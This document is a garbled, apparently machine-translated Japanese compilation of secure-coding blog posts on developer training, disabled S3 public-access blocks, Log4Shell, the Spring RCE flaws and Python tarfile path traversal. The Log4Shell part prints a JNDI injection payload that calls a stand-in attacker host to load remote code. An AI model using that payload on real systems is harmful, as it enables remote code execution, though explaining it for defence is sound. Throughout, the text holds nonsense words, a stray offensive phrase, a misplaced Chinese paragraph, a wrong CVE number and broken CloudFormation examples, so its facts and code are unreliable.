セキュリティコードに関する考察

組織のセキュリティ状態を改善する確実な方法は、高度な開発者にセキュリティコーディングのベストプラクティスにおけるスキルを習得させることです。これらのプラクティスには、ベンチマークやアーキテクチャ基準で提供される手法が含まれ、開発者に必要な体系的な学習経路を提供します。しかし、セキュリティコーディングは単発の解決策ではなく、組織のDNAに組み込まれるべき手法でなければなりません。開発者は単に左シフト（左移動）を行うだけでなく、左シフトを継続的に維持する必要があります。

単なる研修の提供だけでは不十分です。組織は、開発者が業務内容を完全に理解し、ソフトウェア開発ライフサイクル（SDLC）において日常業務の一部として実践することを確認する必要があります。従業員の効率性を追跡し、内部基準や業界ベンチマークに基づいて進捗を測定することで、研修投資のROIを効果的に評価することが可能となります。

セキュリティコードウォリアーメッセンジャースコアは、開発者に個人ユーザーの効率性に関する可視性を提供し、組織全体のシステムを評価するためのデータを集約します。これはハイテク計画における有効性の向上を示すと同時に、改善が必要な領域を特定します。さらに、GDPR（一般データ保護規則）、PCI DSS（支払いカード業界データセキュリティ基準）、CCPA（カリフォルニア州消費者プライバシー法）など、あらゆる規制要件への厳密な準拠を支援します。 （PCI DSS）、カリフォルニア州消費者プライバシー法（CCPA）その他の規制要件を厳密に遵守するための支援を提供します。

私たちの研究は、セキュリティコードトレーニングが効果的であることを示しています。Trust Scoreは、600以上の組織から25万人以上の研究者が業務から得た2000万を超える学習データポイントを活用したアルゴリズムを使用し、脆弱性の低減におけるその有効性と、プログラムの効果を高める方法を実証しています。

トレーニングは安全性を向上させます——もし開発者が白人同士の会話の中で

長年にわたり、ソフトウェア業界では、SDLCの初期段階からセキュリティのベストプラクティスを採用することが理想とされてきた。いずれは実現すべき目標ではあるが、今日の優先事項ではない。しかし、ソフトウェア開発の加速と、複雑化・破壊性を基盤とするサイバー脅威の急増（多くの場合、標的型ソフトウェア脆弱性を悪用したもの）により、セキュリティのエンコーディングが極めて重要となっている。サイバーセキュリティ・インフラストラクチャセキュリティ庁（CISA）は、セキュリティコードを最優先かつ中核に位置づけ、設計段階でのセキュリティ確保を推進する取り組みを進めており、これは国際的な運動へと発展しつつある。 (CISA) は「設計によるセキュリティ保証」イニシアチブを通じて、セキュリティコードを最優先かつ中核に位置づけており、これは国際的な運動へと発展しつつある。

我々の研究は既にこの点を明らかにしている——安全設計手法とソフトウェア脆弱性削減後の相関関係は明白である。SCW顧客群の26％から得られた脆弱性削減データ（少量）を分析した結果、開発者向けミッションソフトウェアの脆弱性削減率は22％から84％の範囲に及ぶことが判明した。この幅は、対象企業の規模（大規模企業は比較的小規模企業よりも脆弱性が多いという結論）や学習グループが専門家であること（この場合、特定の課題に焦点を当てているため、欠陥の解消率がより高くなる）といった変数によって形成されている。

一方、大企業の業務は比較的安定している。開発者のセキュリティスキル向上により、7,000人以上の開発者を擁する企業では脆弱性が47％から53％減少すると予測される。例えば、平均的な企業（プラットフォーム上で特に優れておらず、ベンチマーク上位でもないとされる企業）と比較して、優秀な開発者を多数抱える企業では脆弱性が53％減少した。

当然、最も効果的なトレーニングは、広範で画一的な方法を採用するものではありません。それは開発者の作業環境や、彼らが従事する開発分野に基づいてカスタマイズされるべきです。

企業はまず、開発者が備えるべき基本スキルに関する覚書を策定し、安全なコードを書くことが通常のコーディングと同様に自然になるよう推進すべきである。スキル向上プログラムは、現実のシナリオで実践的なアジャイル操作を進化させる内容を含み、担当業務の種類や使用する言語に適合させる必要がある。また、インスピレーションを与える形で、トレーニングコースを業務スケジュールに組み込めるようにすべきである。

開発者にとって、この技術が統合できるのはプログラミングコードだけではありません。彼らは、AIアシスタントやサードパーティが作成したコンテンツ（オープンソースリポジトリなど）を検証できる手段を必要としています。開発者はすでに生成AIテンプレートの熱狂的な利用に成功しており、コードを迅速かつ大量に作成する上でその利点を広く称賛しています。しかし、Snykの調査では回答者の76%がAI生成コードは人間が作成したコードよりも適切であると回答した一方で、56.4%がAIは時折または頻繁にエラーを生成すると指摘しています。同調査では、80%の開発者がAIコードのセキュリティ対策を実施していないことが判明しており、AIコード内の問題が未解決のままであることを示唆しています。

Secure-by-Design手法を採用することで、開発者は（セキュリティチームと協力し、分離して作業するのではなく）SDLCの初期段階でこれらの問題を解決し、コードが本番環境に投入される前に欠陥を修正します。

信使評価は個人と企業の効率性を測定する

継続的なトレーニングも極めて重要です。企業は安全第一の文化を採用する必要があり、この文化は経営陣から現場スタッフまで全階層に適用されます。SDLC全体を通じて最適なセキュリティ実践を適用することで改善が図られます。技術とサイバー犯罪は進化を止めません。サイバーセキュリティも進化を止めるべきではありません。proscSoftwareにとって、セキュリティトレーニングを受けた開発者は基盤となる存在です。

これが、secremintunctrictrencTrics が無効になった理由であり、Zazagen とトレーニングが同等に重要である所以です。信頼スコアは開発者個人の効率性だけでなく組織全体の効率性を把握できるだけでなく、組織が効率性データを深く分析し、特定の言語、開発チーム、ソフトウェアカテゴリに焦点を当てられるようにします。個人からの 「効率性結論」と「集計」から得られる効果データは、改善が必要な領域を特定する上で有用です。例えば、トレーニングが開発者社員の日常業務に期待通りの影響を与えていない場合などが挙げられます。

Trust Scoreは、組織のエネルギースコアを用いて開発者スタッフの有効性を評価し、必要なセキュリティスキルを習得済みかつ活用しているかどうかを確認します。これにより、組織は信頼できる開発者に最も機密性の高いデータやソフトウェアの重要な権限へのアクセスを安心して許可できる一方、ツールを使用しているものの準備が整っていない開発者への権限付与を拒否することが可能になります。

絶えず変化する安全文化

サイバーセキュリティは単なる安全上の問題ではない。これはビジネス上の問題であり、多くの組織にとって最も貴重な資産（データ）の完全性に影響を及ぼす。深刻な脆弱性は組織の運営や評判を損ない、存続可能性さえ脅かす可能性がある。規制当局はサイバーセキュリティの重要性を軽視しておらず、ますます厳格な規制を実施し、最高情報セキュリティ責任者（CISO）やその他の上級管理職に対して警告を発する姿勢を示している。場合によっては刑事告発に至ることもあり、その例として以下のような事例が挙げられる：UberとSolarWinds。

現代の環境において、企業内の安全文化を調査することは極めて重要です。さらに、同社の多くの貴重な人材がデータ、アプリケーション、サービスを廃止した背景には、安全文化の中核要素である「安全意識」が存在します。対象を絞ったトレーニングとスキル向上は安全文化の構築に不可欠であり、変革を促すトレーニングと支援を組み合わせることで、組織は安全意識強化の道筋を歩むことができます。

開発者主導のセキュリティ計画は価値がある。その中にはメッセンジャーのスコアが含まれていると言われている。

今日、サイバーセキュリティの脅威は至る所に存在し、絶え間なく続いています。私たちの生活のあらゆる側面がデジタル化されるにつれ、サイバー犯罪者が直面するリスクは高まるばかりです——安全が保証されていないコードが多すぎる上、個人データは価値が高すぎるのです。そして、まあ、プログラムを展開した後で攻撃対象領域のあらゆる側面に対応し防御しようとすることは、ほぼ不可能です。

これらの症状の一部を緩和する方法がいくつか存在し、賢明な組織がインフラストラクチャ・アズ・コード（IaC）の概念を受け入れる際には、その一つが明らかになる。もちろん、あらゆる開発と同様に、対処すべきセキュリティ上の落とし穴が存在する。さらに、開発者がアプリケーションをホストするための重要なインフラストラクチャを生成するコードを研究しているため、プロセスの各段階でセキュリティ意識が極めて重要となる。

では、クラウドサーバー環境に初めて触れる開発者は、どのようにスキルを向上させ、技術を学び、セキュリティ意識を高めながら構築を進めればよいのでしょうか？私たちは、よくあるIaC（Infrastructure as Code）の脆弱性に対処するため、新たな「Coders Conquer Security」シリーズを立ち上げました。今後のブログでは、あなた（開発者）が組織内でコードベースのセキュリティ基盤を構築するために踏み出せる具体的なステップに焦点を当てていきます。

さあ、始めましょう。

アメリカの旧西部には、ある偏執的な男についての寓話がある。彼は強盗が自分の家を襲って略奪すると信じていた。その代償として、彼は様々な防犯対策に投資した。例えば超頑丈な玄関ドアの設置、全ての窓の格子化、そして大量の銃器を手の届く場所に配置した。ある夜、彼が寝ている間に強盗に遭ったのは、サイドドアの施錠を忘れたためだった。強盗は機能不全の警備員を見つけ出し、素早くその状況を利用したのである。

インフラストラクチャでセキュリティ機能を無効化することは、このようなものです。たとえネットワークが強力なセキュリティ基盤を備えていても、要素が無効化されていれば意味がありません。

潜入する前に、一つ挑戦を提案させてください：

上記のリンクにアクセスすると、当社のゲーミフィケーション型トレーニングプラットフォームに移動します。すぐに無効化されたセキュリティ機能の脆弱性を克服する練習を開始できます。（注：Kubernetes環境で起動しますが、ドロップダウンメニューからDocker、CloudFormation、Terraform、Ansibleを選択可能です）。

どうですか？まだやるべき仕事があるなら、読み進めてください：

セキュリティ機能は様々な理由で無効化される可能性があります。一部のアプリケーションやフレームワークでは、デフォルトで無効化されており、動作を開始する前に有効化する必要があります。また、管理者が特定のタスクを容易に実行するため、頻繁に警告やブロックを受けずに済むよう（例：AWS S3バケットを公開状態にする）、特定のセキュリティ機能を無効化している場合もあります。作業完了後、それらの無効化された機能を再有効化するのを忘れてしまう可能性があります。また、将来の作業を容易にするために、意図的に無効化したままにしておく場合もあります。

なぜ無効化されたセキュリティ機能が危険なのか

1つまたは複数のセキュリティ機能を無効化することは好ましくない。理由は2つある。まず、セキュリティ機能は既知の脆弱性、脅威、または欠陥からインフラストラクチャリソースを保護するために導入される。無効化すれば、リソースを保護できなくなる。

攻撃者は常にまず、悪用しやすい脆弱性を見つけようと試みます。場合によっては、一般的な脆弱性を修正するスクリプトを使用することさえあります。これは、泥棒が通りにある全ての車のドアがロックされていないか確認するのと変わりません。窓を割るよりもずっと簡単だからです。ハッカーは、一般的なセキュリティ対策が非アクティブ状態にあることに驚くかもしれません。しかし、そのような状況が発生すると、彼らはすぐにそれを悪用します。

次に、適切なセキュリティ設定を施した上で機能を無効化すると、偽りの安心感が生まれます。管理者が防御機能が無効化されていることを知らなければ、一般的な脅威から免れていると誤解する可能性があります。

攻撃者が無効化されたセキュリティ機能を悪用する例として、パブリックアクセスをブロックするAWS S3のセキュリティ機能が挙げられます。Amazon S3のパブリックアクセスブロック機能を利用すれば、アカウント管理者やバケット所有者は、Amazon S3リソースへの公開アクセスを制限する集中管理を簡単に設定できます。しかし、一部の管理者はS3バケットへのアクセスに問題が生じた際、作業を迅速に完了させるために公開することを選択します。このセキュリティ機能を有効化するのを忘れた場合、攻撃者は当該S3バケットに保存された情報に完全にアクセス可能となり、情報漏洩を引き起こすだけでなく、データ転送料による追加費用が発生する可能性があります。

現実世界のコードを比較してみましょう。以下の CloudFormation コード断片をご覧ください：

脆弱性：

企業用ストレージバケット：
タイプ：AWS::S3::Bucket
属性：
パブリックアクセスブロック設定：
blockPublicACLs：エラー
BlockPublicy：エラー
ignorepublicacls：エラー
restrictPublicBuckets：
バージョン管理設定：
状態：有効
バケット暗号化：
サーバーサイド暗号化設定：
- デフォルトのサーバーサイド暗号化：
SSE アルゴリズム：「AES256」

安全：

企業ストレージバケット：
タイプ：AWS::S3::Bucket
属性：
パブリックアクセスブロック設定：
blockPublicACLs：はい
BlockPublic：はい
ignorePublicACLs：
restrictPublicBuckets：
バージョン管理設定：
状態：有効
バケット暗号化：
サーバーサイド暗号化設定：
- デフォルトのサーバーサイド暗号化：
SSEアルゴリズム：「AES256」

安全機能の無効化を防止

セキュリティ機能の無効化が組織に悪影響を及ぼすことを阻止することは、政策上の問題であると同時に実践上の問題でもあります。セキュリティ機能を無効化できるのは極めて特殊な状況に限るという確固たる方針を策定すべきです。問題解決やアプリケーション更新のために機能を一時的に無効化せざるを得なかった事象は記録する必要があります。必要な作業が完了した後、機能が完全に再有効化されていることを確認するための点検を実施すべきです。

セキュリティ機能を簡素化のために恒久的に無効化する必要がある場合、影響を受けるデータに対して他の保護手段を提供し、デフォルトの保護がない状態でもハッカーがその機能にアクセスできないようにすべきである。必要な保護機能が既に無効化されているならば、攻撃者が施錠されていない扉を見つけ、この状況を利用するまで時間の問題に過ぎない。

もっと学び、自分自身に挑戦しよう：

セキュリティコードの専門家によるブログページをご覧ください。この脆弱性について詳しく知り、組織や顧客を他のセキュリティ侵害や脆弱性の被害から守る方法を確認できます。

この記事を読み終えた今、この脆弱性を発見し修正する準備はできていますか？Secure Code Warrior プラットフォームでiMacゲーム化セキュリティチャレンジに挑戦する時が来ましたSecure Code Warrior バーセキュリティスキルを磨き続け、最新の状態に保ちましょう。

これは毎週連載されるシリーズ記事で、上位8つの「インフラストラクチャ・アズ・コード」脆弱性を網羅しています。来週も続報をお楽しみに！

以前のブログ記事では、Javaの落とし穴「ビット演算子とブール演算子」について説明しました。

• Javaの落とし穴 - ビット演算子とブール演算子

私たちは「Challenge TheSenseiという面白い小テストに、この変種とその他のJavaの落とし穴を追加しました。

• scw.typeform.com/to/rgw7q7oe

もしあなたが上記のブログ記事を読んだのであれば、少なくとも一つの質問に答えるのに最適な場所となるでしょう。

しかしあなたの友人はそうではないかもしれません。ですから、もしこのテストが面白いと思ったら、彼らと共有してみて、彼らのスコアがあなたと同じかどうか確かめてみてください。

私たちは単に質問するだけではないからです。教育や知識の体系化に役立てたいと考えています。そこで、問題と解決策の実行可能なコード例をまとめたGitHubリポジトリを作成しました。

• github.com/secureCodeWarrior/Challenge-the-

これは教師が有効化したリポジトリです。

リポジトリをクローンして IntelliJ に読み込む際、Secure Code Warrior Senseiが IntelliJ プラグインをインストールしていると仮定します。プラグインは自動的に .sensei フォルダを検出しsensei Sensei sensei 。

IDEでコードを閲覧する際、IntelliJがコード内のエラーを提示しているはずです。これにより、コードの問題点をより容易に確認できるはずです：

• マウスを強調表示されたコードの上に置くと、エラーを通知するヒントが表示されます。
• 「コンテキスト操作を表示」キー（Windows: Alt+Enter、macOS: Option+Enter）を使用すると、コードを修正できるクイックフィックスが表示される場合があります。

Sensei レシピを追加しました。Sensei ：

• ビット演算子
• IPアドレスの分割
• 断言注文

今後、残りのコードを網羅するために、より多くのレシピと説明文を追加する予定です... しかし、それによって自分でコードを確認し、エラーを発見するのを妨げないでください。

テストを試してみてから「先生に挑戦」してみてください

12月9日、JavaライブラリLog4jに存在した0日脆弱性が公表された。CVE-44228（ 通称Log4Shell ） は、リモートコード実行を引き起こす可能性から「高深刻度」評価（Critical）を受けた。さらに、log4j-coreは最も広く使用されているJavaログライブラリの一つであるため、数百万のアプリケーションが危険に晒されている。

Log4Shellのスキルを素早く向上させたいですか？

私たちは、Log4Shellの基本概念から、Missionというシミュレーターでこの脆弱性を悪用する体験までを案内するデモ環境を構築しました。このミッションでは、Log4jの脆弱性がインフラストラクチャやアプリケーションにどのような影響を与えるかを理解していただきます。デモ環境に直接アクセスするにはこちらをクリック、または脆弱性の詳細について読み進めてください。

古いニュース？

この脆弱性は決して新しいものではない。セキュリティ研究者たちは2016年のBlackHat講演で、アルバロ・ムニョスとオレクサンドル・ミロシュが「アプリケーションは信頼できないデータでJNDIクエリを実行すべきではない」と強調し、標的型JNDI/LDAPインジェクションがリモートコード実行を引き起こす仕組みを説明していた。そしてこれこそがLog4Shellの中核である。

攻撃ベクトル

Log4Shell の注入ペイロードは以下の通りです：

$ {jndi: ldap: //attacker.host/xyz}

要理解这一点，我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式： $ {expr} 将在运行时进行评估。例如，$ {java: version} 将返回正在使用的 Java 版本。

次に JNDI（Java Naming and Directory Interface）について説明します。これは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データやリソースを取得することを可能にする API です。簡単に言えば、上記の悪意のあるペイロードの例では、JNDI が攻撃者が制御する LDAP サーバーに対してクエリを実行します。例えば、その応答は悪意のあるコードを含む Java クラスファイルを指し示す可能性があり、その見返りとして、そのファイルは脆弱なサーバー上で実行されます。

この脆弱性が深刻な問題となる理由は、Log4jがすべてのログエントリを評価し、「jndi」で始まるEL構文で記述された記録済みユーザー入力をすべてクエリするためです。フォームフィールドなど、ユーザーが入力可能なあらゆる場所にペイロードを注入できます。さらに、ユーザーエージェントやX-Forwarded-ForなどのHTTPヘッダーやその他のヘッダーをカスタマイズしてペイロードを運ぶことも可能です。

自ら脆弱性を体験するには、展示エリアへお越しいただき、ステップ2「影響力を体感する」へお進みください。

予防：意識

Log4jは脆弱なコードの修正を継続しているため、すべてのアプリケーションのアップグレードを推奨します。ただし、バージョン2.15.0および2.16.0にはDDoS攻撃やその他の脆弱性が含まれているため、12月下旬以降は2.17.0へのアップグレードが推奨されます。

開発者がコードを書く際には、常にセキュリティを考慮する必要があります。Log4Shellは、サードパーティのフレームワークやライブラリの使用がリスクを伴うことを教えてくれました。外部リソースを利用することがアプリケーションのセキュリティを損なう可能性があるという事実を認識すべきであり、私たちは無邪気に外部リソースが安全だと信じています。

この脆弱性は予防できるか？できる場合とできない場合がある。一方で、開発者がより多くのことを行えるのは、サードパーティ製ソフトウェアを通じて脆弱なコンポーネントが導入された場合に限られる。他方で、ここから得られる教訓は繰り返し強調されるものであり、ユーザーの入力は決して信用してはならないということだ。

セキュアコードウォリアー（SCW）は、セキュリティ意識の高い開発者がコードの脆弱性を防ぐ最善策であると考えています。SCWが特定のプログラミングフレームワーク向けトレーニングを大規模に提供しているため、企業顧客はレポートデータを活用して影響を受けるJava開発者を迅速に特定できます。また、SCWトレーニングを受けたセキュリティサポーターの力を借りて、Log4jのアップグレードを加速させています。

特にJava開発者向けに、Secure Code Warrior SenseiSecure Code Warrior 。このルールベースのコード分析ツールは、コーディングガイドラインの強制適用や脆弱性の予防・修正に活用できます。独自のルールを作成できるほか、当社の既成ルール「レシピ」も利用可能です。レシピを閲覧する際は、Log4Shell脆弱性を瞬時に発見・修正できるLog4jレシピのダウンロードもお忘れなく。

Log4Shell に対する防御スキルを向上させる

このブログ記事で学んだことを実践してみませんか？当社のデモ環境がそれを実現します。デモの冒頭で脆弱性の概要を説明した後、シミュレーション環境へご案内します。そこでガイドに従い、実際に脆弱性を再現する手順を試すことができます。

‍

最近、Javaコミュニティで最も人気のあるライブラリの一つであるSpringライブラリにおいて、リモートコード実行（RCE）に関連する2つの脆弱性が公表されました。皆様が脆弱性のリスクにさらされているかどうか、またどのような対策を講じるべきかをより容易に理解できるよう、「Spring4Shell」と「Spring Cloud Function」に関する既知の詳細情報を以下に整理しました。

脆弱性 1-「Spring4Shell」 (CVE-2022-22965)

2022年3月29日、当該コミュニティは一連のツイートを発見した。そこにはSpring Core（SC）の脆弱性に対する概念実証（PoC）のスクリーンショットが含まれており、この脆弱性により、最近リリースされたバージョン5.3.17を含む、すべてのバージョンのSpring Coreコードをリモートで実行することが可能となる。

どのアプリケーションがリスクにさらされているのか？

現時点では、Tomcat上にホストされているアプリケーションのみが、この新たな脆弱性のリスクにさらされていることが確認されています。組み込みTomcatサーブレットコンテナやその他の非Tomcatホストアプリケーションに対する攻撃の成功例は確認されていませんが、将来的にこれらのフレームワークが脅威に悪用される可能性を排除するものではありません。

春季に公式声明が発表され、この脆弱性について、現在の理解に基づくと、攻撃を受けるには以下の条件を満たす必要があることが明らかにされました：

• JDK 9 以降
• Apache Tomcat はサーブレットコンテナとして
• 従来のWAR形式でパッケージ化（Spring Bootの実行可能JARとは対照的に）
• Spring Web MVC または Spring WebFlux の依存関係
• Spring Framework バージョン 5.3.0 から 5.3.17、5.2.0 から 5.2.19 およびそれ以前のバージョン

「Spring4Shell」脆弱性はどのように動作するのか？

この脆弱性は、メソッド署名でPOJO（Plain Old Java Object）を使用するリクエストにおいて「データバインディング」（org.springframework.web.bind.WebDataBinder）が利用されることに依存しています：

FooクラスはPOJOクラスであり、以下のように定義できます。実際のクラスは重要ではなく、クラスローダーによって読み込まれることが重要です。

このリクエストがこのような方法で処理される場合、クラスローダーは当該クラスの解析に使用されます。クラスローダーは、実行時にクラスをロードする役割を担い、事前にすべての可能性のある型をメモリにプリロードする必要はありません。新しいクラスを使用する際に、どの.jarファイルをロードすべきかを計算します。

この脆弱性に関する最新かつ詳細な情報は、Springの公式ブログ記事から直接入手できます。潜在的な修正方法や回避策も含まれています。

脆弱性 2-Spring Cloud 関数 (CVE-2022-22963)

2022年3月27日、Cyber KendraはSpring Cloud Functionsにおけるパッチ未適用の0日脆弱性（リモートコード実行：RCE）の詳細情報を公開した。この脆弱性はCVE-2022-22963（Spring式リソースアクセス脆弱性）として割り当てられた。

どのアプリケーションがリスクにさらされているのか？

この脆弱性は、以下の条件下にあるアプリケーションに影響を与えます：

• JDK 9 以降
• Spring Cloud Functions バージョン 3.1.6（またはそれより低いバージョン）、3.2.2（またはそれより低いバージョン）、またはサポートされていないバージョン

搾取はどのように機能するのか？

Spring Cloud Function は、開発者が spring.cloud.function.routing-expression プロパティを通じてルーティング処理方法を設定できるようにします。通常は設定ファイルやコードで行われます。これは 「Spring 表現言語」(SpEL) の強力な機能を受け入れます。この0日間の脆弱性により、このプロパティがリクエストのHTTPヘッダーを通じて設定可能であることが判明しました。これは攻撃者がSpELコードを直接自身のRoutingFunctionエンドポイントへのHTTPリクエストに埋め込み、任意のコードを実行できることを意味します。

ユーザーはリスクを軽減するためにどのような対策を講じるべきですか？

SpringFramework3.1.7 および 3.2.3では、この属性を HTTP ヘッダーで設定できないようにすることでこの問題を修正し、脆弱性を緩和しています。いずれかのバージョンにアップグレードすれば、追加の手順は不要です。

開発者がより安全なコードを書くための支援方法について、さらに詳しく知りたいですか？デモを予約するか、無料の安全なコーディングガイド「安全コードコーチ」をご覧ください。

‍

資料出典

• https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
• https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/

‍

最近、あるセキュリティ研究者グループが、Pythonのtarファイル展開機能に15年間存在していた欠陥を発見したと発表した。この脆弱性は2007年に初めて報告され、CVE-2007-4559として追跡されている。Pythonの公式ドキュメントには注記が追加されたが、欠陥自体は修正されていない。

この脆弱性は数千ものソフトウェアプロジェクトに影響を及ぼす可能性がありますが、多くの人はその状況や対処方法に精通していません。だからこそ、セキュリティコードウォリアーズでは、この脆弱性を自らシミュレートして悪用する機会を提供し、その影響を直接目撃し、この持続的な欠陥のメカニズムを体感していただくことで、アプリケーションをより効果的に保護できるよう支援します！

今すぐミッションをシミュレートしてみよう。

脆弱性：tarファイル抽出時のパストラバーサル

未検証のユーザー入力を使用してファイルパスを構築する場合、パストラバーサルまたはディレクトリトラバーサルが発生し、攻撃者がアクセス権を取得し、ファイルを上書きし、さらには任意のコードを実行することを可能にします。

この脆弱性はPythonのtarfileモジュールに存在します。tar（テープアーカイブ）ファイルは単一のファイル（アーカイブ）であり、複数のファイルとそのメタデータをまとめて格納します。通常、.tar.gzまたは .tgz拡張子で識別されます。アーカイブ内の各メンバーは、ファイル名、最終更新日時、所有権などのメタデータを含むTarInfoオブジェクトで表現できます。

リスクは、ファイルを再度抽出できることに起因する。

抽出時には、各メンバーに対して書き込み先パスを指定する必要があります。この位置は、基本パスとファイル名を連結することで作成されます：

このパスを作成すると、それは tarfile.extra または tarfile.extall の抽出を実行する関数に渡されます：

問題点はファイル名の検証が不十分であることです。攻撃者はパストラバーサル文字（例：../）を含むようにファイル名を変更でき、これによりファイルが本来あるべきディレクトリから移動し、任意のファイルを上書きします。これは最終的にリモートコード実行につながる可能性があり、攻撃の機会はすでに熟しています。

この脆弱性を特定する方法を知っているなら、他のシナリオでも同様の脆弱性が存在する可能性があります。Pythonのtarファイル処理以外にも、zipファイルの展開処理にもこの脆弱性は存在します。別の名称で知られている可能性もあります——例えば「圧縮ファイル脆弱性」として、Python以外の言語でも既に確認されています！

タスクへのリンク 

リスクをどのように低減するか？

この脆弱性は長年知られていたにもかかわらず、Pythonのメンテナンス担当者は抽出機能が意図した動作をしていると考えていました。この状況では「これは機能であってバグではない」と主張する者もいるかもしれません。残念ながら、開発者は未知のソースからのtarやzipファイルの抽出を常に回避できるわけではありません。安全な開発プラクティスの一環として、パストラバーサル脆弱性を防ぐため、信頼できない入力のクリーンアップを行う責任があります。

Python を使用して安全なコードを書き、リスクを軽減する方法についてさらに詳しく知りたいですか？

当社の無料Pythonチャレンジをお試しください。

無料のプログラミングガイドをもっと入手したい場合は、安全なコーディング慣行を習得するのに役立つ「安全コードコーチ」をご覧ください。

‍

‍

ミチャ・マルティネスは、学生ローンと教育金融サービスの管理・返済業務を手がける米国Nelnetのサイバーセキュリティアナリスト兼映画カメラマンである。開発者向けの安全なコーディングに関するトレーニングプログラムを構築する責任を担った際、彼はチームを惹きつける創造的な手法を採用した。彼が安全なコードトレーニングプログラムを運営する手法に私たちは感銘を受け、彼と対談して詳細を伺うことにした。

底線？

安全文化を構築し、開発チーム内で内部のセキュリティ推進者を育成し、「善なる力となる」こと。

「安全なコードに注力することで、私たちは企業がより強固で安全になるよう支援します。」

Nelnetでは、Michaと彼のセキュリティチームは当初から安全なコード構築の重要性を理解していました。彼らはこれを魅力的で関連性が高く有益な方法で実現したいと考えていました。彼は、セキュリティコーディングに強い関心と熟練度を持つ開発者を特定し、彼らをセキュリティ推進者として育成することで、これらの擁護者がセキュリティトレーニングの考え方の触媒となることを発見しました。こうした人材は、ピアツーピアの支援を必要とする同僚を指導し、組織内でセキュリティコードの実践変更を実施するリーダーとなります。

以下はMichaの追加内容です。彼と彼のチームが、セキュリティ対策に関する考え方と文化をどのように変革し、その結果、彼らの会社を「より強固で、より安全な」ものにしたかを語っています。

すべては吹聴権に関わっている…そして欠陥を減らすこと

ミハは一般的なセキュリティ研修プログラムを実施しません。彼は競争と自身の写真撮影の才能を活用し、コンテストを非常に魅力的で成功させるのです。開発者が得られるのは、より強力なセキュリティコードを生成できる、高度に関連性のある実践的な知識です。

彼らの製品がより安全になり、ソフトウェアの脆弱性に対する保護レベルが向上するにつれて、この企業も成功を収めています。ソフトウェアセキュリティの学習は、典型的な退屈な学習体験である必要はなく、単なるチェックボックスを埋める作業ではありません。開発者は、没入感があり、挑戦的で、日常業務に関連したトレーニング体験を求めています。

マイカが、安全なプログラミングトレーニングをいかに競技を通じて面白くしたかについて語る様子をご覧ください。賞品にはフィットネスチャンピオンベルトやレッスルマニアが含まれます。彼のチームに安全を最優先させるには、健全な競争心さえあれば十分なのです。

誰が自慢する権利を嫌うだろうか？

‍

安全なコーディングを中心とした文化を受け入れる... このツールだけでは不十分だ

ミカは最後に、Secure Code Warrior推奨するのかという考えを私たちに残しました。このプラットフォームは、予防文化と能動的学習を促進するツールとして彼を駆り立てたのです。トレーニング計画の策定には時間がかかり、訓練を受け良好な成果を上げる開発者への投資も必要です。各開発者が予防的なアプローチで安全なコーディングを行うスキルを育むには、変革的な文化が求められます。

以下はMichaからの追加情報です。安全なコーディング文化を受け入れることが、Secure Code Warrior 理由について説明しています。

Secure Code Warrior 。デモにご興味がありますか？下記からご予約ください。

私たちはラリー・マッケローネ氏と対談し、セキュリティ分野のリーダーであるモダンアプリケーションセキュリティについて議論しました。同氏はコード分析と攻撃防御をソフトウェアに直接組み込む手法を提唱しています。また、コンテキスト学習が開発者に安全なコーディングを習得させる上でいかに効果的であるかについても話し合いました。

現代の開発者は、明日のサイバーセキュリティ上の脆弱性を防ぐという任務をますます担うようになっています。コードの脆弱性に関するトレーニングは提供可能ですが、通常は開発者の日常業務とは無関係で魅力のない形式で提供されます。開発者は顧客の要求を満たすために迅速にコードを書く必要があり、トレーニングなどの業務目標は後回しにされがちです。さらに、こうしたトレーニングが文脈から切り離され、長々としたプレゼンテーションや学習マニュアルの形で提供されると、その負担はさらに増大し、追加の努力がどのような利益をもたらすのかが見えにくくなります。

組織は、開発者の日常業務を妨げたり、彼らが好むツールやワークフローから遠ざけたりすることなく、どのようにして開発者に重要なセキュリティトレーニングを提供できるでしょうか？

答えは簡単です。コンテキスト学習を活用することで、開発者がすぐに利用できるトレーニングを提供します。Larryが以下の動画で、なぜこれが開発者にとって非常に強力なのかを説明しています。

開発者がコードの問題をレビューする際にトレーニング機会を統合することで、発見された問題や脆弱性と最も関連性の高い情報を即座に得られます。さらに、トレーニングがより小さく理解しやすいブロックで提供されるため、開発者は情報を保持し、将来的に脆弱なコードを使用するのを防ぐ可能性が高まります。ラリーが言うように、「フィードバックは学習の鍵」なのです。

最も重要なのは、開発者がより短時間でより多くの作業を完了し、安全で高品質なコードを提供する必要があることです。コードの脆弱性に対する状況に応じたトレーニングを組み込むことで、開発者のワークフローと体験を最適化し、定着率を向上させます。ラリーが40時間のトレーニング時間を節約する方法を語るのを聞いてみましょう！

Secure Code Warrior に関連性の高い学習を提供します。

デモに興味がありますか？下記からご予約ください。

‍

ソフトウェア開発ライフサイクル（SDLC）は、一見何の変哲もないプロセスのように見えますが、私たちソフトウェア関係者が一丸となって魔法をかけ、社会になくてはならないデジタルグッズを出荷します。

ただし、ソフトウェア開発プロジェクトに参加したことがある人ならわかると思いますが、それはたいていの場合、征服すべき多くのクエストや倒すべき多くのドラゴンが登場する試練です。しばらくの間は楽しいですが、燃え尽き症候群になることもあります。また、ソフトウェアの需要が高いため、私たちは皆、特に開発チームは最高の状態で光の速さで働いています。

さらに、もう一つの必須課題、すなわち、自分が関わるプロジェクト要素のセキュリティに対する責任を負わされたとします。最悪の場合、一部の個人にとってはカードの家が崩壊することになるかもしれませんが、より現実的なシナリオとしては、単に優先順位が低く、より差し迫った問題が優先されるということです。ほとんどの開発者が安全なコードを書くためのトレーニングを受けていない場合（特に彼らの上司がセキュリティを優先していない場合）、頻繁なデータ漏洩、欠陥のあるアプリのリリース、そしてバグのあるコードの雪崩の下で限界に達するセキュリティ専門家の深刻な混乱を目にするのも不思議ではありません。

開発者には、AppSecの提唱者が必要です。

上記のシナリオを考慮すると、コーディングの過程でセキュリティが「難しすぎる」と判断され、セキュリティチームに任されてしまう理由がわかります。競合する締め切りが多すぎて、十分なトレーニングを受けられず、他のすべてのことが起こっている中でセキュリティを気にする本当の理由がないのです。しかし、このような現状を続けるには、コードに対する需要があまりにも多すぎるのです。そこで、スーパーエリート開発者は、他の開発者に差をつけ、新しいスキルを学び、そして何よりも、より安全なコードを構築することができるのです。

